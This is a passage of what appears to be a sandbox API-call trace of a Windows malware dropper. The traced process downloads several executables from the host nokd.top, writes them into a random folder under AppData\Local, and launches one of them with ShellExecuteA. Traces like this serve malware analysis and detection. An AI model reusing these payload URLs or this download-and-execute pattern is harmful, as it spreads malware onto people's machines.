lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.829] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.830] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.859] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.860] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.861] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.861] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.864] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.864] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.865] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.867] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0110.867] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0110.868] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x1200) returned 1 [0110.868] WriteFile (in: hFile=0x6dc, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x1200, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x1200, lpOverlapped=0x0) returned 1 [0110.869] CloseHandle (hObject=0x6dc) returned 1 [0110.872] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0110.885] InternetCloseHandle (hInternet=0xcc0004) returned 1 [0110.885] ShellExecuteA (hwnd=0x0, lpOperation=0x0, lpFile="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\updatewin2.exe", lpParameters=0x0, lpDirectory=0x0, nShowCmd=1) returned 0x2a [0111.039] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x333f418 | out: hHeap=0x730000) returned 1 [0111.039] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33948d0 | out: hHeap=0x730000) returned 1 [0111.039] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33926e8 | out: hHeap=0x730000) returned 1 [0111.039] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0004 [0111.039] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f38 [0111.039] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x85e) returned 0x3340d10 [0111.039] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3382f38, cbMultiByte=-1, lpWideCharStr=0x3340d10, cchWideChar=1071 | out: lpWideCharStr="http://nokd.top/files/penelop/updatewin.exe") returned 44 [0111.039] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x860) returned 0x33926e8 [0111.039] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3340d10 | out: hHeap=0x730000) returned 1 [0111.039] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f38 | out: hHeap=0x730000) returned 1 [0111.039] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x860) returned 0x3340d10 [0111.039] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x82f) returned 0x9bf6330 [0111.039] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://nokd.top/files/penelop/updatewin.exe", cchWideChar=-1, lpMultiByteStr=0x9bf6330, cbMultiByte=2095, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://nokd.top/files/penelop/updatewin.exe", lpUsedDefaultChar=0x0) returned 44 [0111.039] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bf5aa8 [0111.040] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bf6330 | out: hHeap=0x730000) returned 1 [0111.040] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3340d10 | out: hHeap=0x730000) returned 1 [0111.040] InternetOpenUrlA (hInternet=0xcc0004, lpszUrl="http://nokd.top/files/penelop/updatewin.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc000c [0111.233] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bf5aa8 | out: hHeap=0x730000) returned 1 [0111.233] HttpQueryInfoW (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x9bad6d0, lpdwBufferLength=0x9bad710, lpdwIndex=0x0 | out: lpBuffer=0x9bad6d0*, lpdwBufferLength=0x9bad710*=0x4, lpdwIndex=0x0) returned 1 [0111.233] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33926e8 | out: hHeap=0x730000) returned 1 [0111.233] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0010 [0111.233] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3382f38 [0111.233] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x84e) returned 0x3340d10 [0111.233] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3382f38, cbMultiByte=-1, lpWideCharStr=0x3340d10, cchWideChar=1063 | out: lpWideCharStr="http://nokd.top/files/penelop/3.exe") returned 36 [0111.233] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x850) returned 0x33926e8 [0111.233] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3340d10 | out: hHeap=0x730000) returned 1 [0111.233] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3382f38 | out: hHeap=0x730000) returned 1 [0111.234] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x850) returned 0x3340d10 [0111.234] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x827) returned 0x9c0c3f0 [0111.234] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://nokd.top/files/penelop/3.exe", cchWideChar=-1, lpMultiByteStr=0x9c0c3f0, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://nokd.top/files/penelop/3.exe", lpUsedDefaultChar=0x0) returned 36 [0111.234] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bf5aa8 [0111.234] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9c0c3f0 | out: hHeap=0x730000) returned 1 [0111.234] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3340d10 | out: hHeap=0x730000) returned 1 [0111.234] InternetOpenUrlA (hInternet=0xcc0010, lpszUrl="http://nokd.top/files/penelop/3.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0018 [0111.428] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bf5aa8 | out: hHeap=0x730000) returned 1 [0111.428] HttpQueryInfoW (in: hRequest=0xcc0018, dwInfoLevel=0x20000013, lpBuffer=0x9bad6d0, lpdwBufferLength=0x9bad710, lpdwIndex=0x0 | out: lpBuffer=0x9bad6d0*, lpdwBufferLength=0x9bad710*=0x4, lpdwIndex=0x0) returned 1 [0111.428] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33926e8 | out: hHeap=0x730000) returned 1 [0111.428] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc001c [0111.428] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3383130 [0111.428] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x84e) returned 0x3340d10 [0111.428] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3383130, cbMultiByte=-1, lpWideCharStr=0x3340d10, cchWideChar=1063 | out: lpWideCharStr="http://nokd.top/files/penelop/4.exe") returned 36 [0111.428] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x850) returned 0x33926e8 [0111.428] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3340d10 | out: hHeap=0x730000) returned 1 [0111.428] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3383130 | out: hHeap=0x730000) returned 1 [0111.429] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x850) returned 0x3340d10 [0111.429] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x827) returned 0x9c0c3f0 [0111.429] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://nokd.top/files/penelop/4.exe", cchWideChar=-1, lpMultiByteStr=0x9c0c3f0, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://nokd.top/files/penelop/4.exe", lpUsedDefaultChar=0x0) returned 36 [0111.429] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bf5aa8 [0111.429] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9c0c3f0 | out: hHeap=0x730000) returned 1 [0111.429] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3340d10 | out: hHeap=0x730000) returned 1 [0111.429] InternetOpenUrlA (hInternet=0xcc001c, lpszUrl="http://nokd.top/files/penelop/4.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0024 [0111.622] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bf5aa8 | out: hHeap=0x730000) returned 1 [0111.622] HttpQueryInfoW (in: hRequest=0xcc0024, dwInfoLevel=0x20000013, lpBuffer=0x9bad6d0, lpdwBufferLength=0x9bad710, lpdwIndex=0x0 | out: lpBuffer=0x9bad6d0*, lpdwBufferLength=0x9bad710*=0x4, lpdwIndex=0x0) returned 1 [0111.622] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33926e8 | out: hHeap=0x730000) returned 1 [0111.622] InternetOpenA (lpszAgent="Microsoft Internet Explorer", dwAccessType=0x0, lpszProxy=0x0, lpszProxyBypass=0x0, dwFlags=0x0) returned 0xcc0028 [0111.622] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x33831d8 [0111.622] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x84e) returned 0x33926e8 [0111.622] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x33831d8, cbMultiByte=-1, lpWideCharStr=0x33926e8, cchWideChar=1063 | out: lpWideCharStr="http://nokd.top/files/penelop/5.exe") returned 36 [0111.622] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x850) returned 0x9c0c3f0 [0111.622] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33926e8 | out: hHeap=0x730000) returned 1 [0111.622] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33831d8 | out: hHeap=0x730000) returned 1 [0111.622] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x850) returned 0x33926e8 [0111.622] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x827) returned 0x9c0cc48 [0111.622] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="http://nokd.top/files/penelop/5.exe", cchWideChar=-1, lpMultiByteStr=0x9c0cc48, cbMultiByte=2087, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="http://nokd.top/files/penelop/5.exe", lpUsedDefaultChar=0x0) returned 36 [0111.622] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x830) returned 0x9bf5aa8 [0111.622] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9c0cc48 | out: hHeap=0x730000) returned 1 [0111.622] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x33926e8 | out: hHeap=0x730000) returned 1 [0111.623] InternetOpenUrlA (hInternet=0xcc0028, lpszUrl="http://nokd.top/files/penelop/5.exe", lpszHeaders=0x0, dwHeadersLength=0x0, dwFlags=0x0, dwContext=0x0) returned 0xcc0030 [0111.818] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x9bf5aa8 | out: hHeap=0x730000) returned 1 [0111.818] HttpQueryInfoW (in: hRequest=0xcc0030, dwInfoLevel=0x20000013, lpBuffer=0x9bad6d0, lpdwBufferLength=0x9bad710, lpdwIndex=0x0 | out: lpBuffer=0x9bad6d0*, lpdwBufferLength=0x9bad710*=0x4, lpdwIndex=0x0) returned 1 [0111.818] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x30) returned 0x3383280 [0111.818] HeapFree (in: hHeap=0x730000, dwFlags=0x0, lpMem=0x3383280 | out: hHeap=0x730000) returned 1 [0111.818] lstrcpyA (in: lpString1=0x33337d0, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5" [0111.818] PathAppendA (in: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5", pMore="5.exe" | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\5.exe") returned 1 [0111.818] RtlAllocateHeap (HeapHandle=0x730000, Flags=0x0, Size=0x60) returned 0x333f418 [0111.818] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\5.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\1eed4f4c-ee3f-42d5-9fd1-74f531bda6b5\\5.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x6d8 [0111.825] SetFilePointer (in: hFile=0x6d8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0111.825] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0111.857] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0111.859] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0111.926] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0111.926] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0111.927] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0111.928] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0111.964] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0111.965] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0111.966] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0111.967] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0111.968] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0111.969] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0111.970] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0111.970] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.019] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.019] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.020] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.021] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.021] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.021] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.022] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.022] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.022] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.023] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.023] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.024] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.061] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.061] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.079] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.080] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.080] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.081] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.081] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.081] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.082] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.082] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.082] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.083] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.083] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: lpBuffer=0x9bad778*, lpNumberOfBytesWritten=0x9bad6dc*=0x2800, lpOverlapped=0x0) returned 1 [0112.084] InternetReadFile (in: hFile=0xcc0030, lpBuffer=0x9bad778, dwNumberOfBytesToRead=0x2800, lpdwNumberOfBytesRead=0x9bad6d8 | out: lpBuffer=0x9bad778*, lpdwNumberOfBytesRead=0x9bad6d8*=0x2800) returned 1 [0112.125] WriteFile (in: hFile=0x6d8, lpBuffer=0x9bad778*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x9bad6dc, lpOverlapped=0x0 | out: 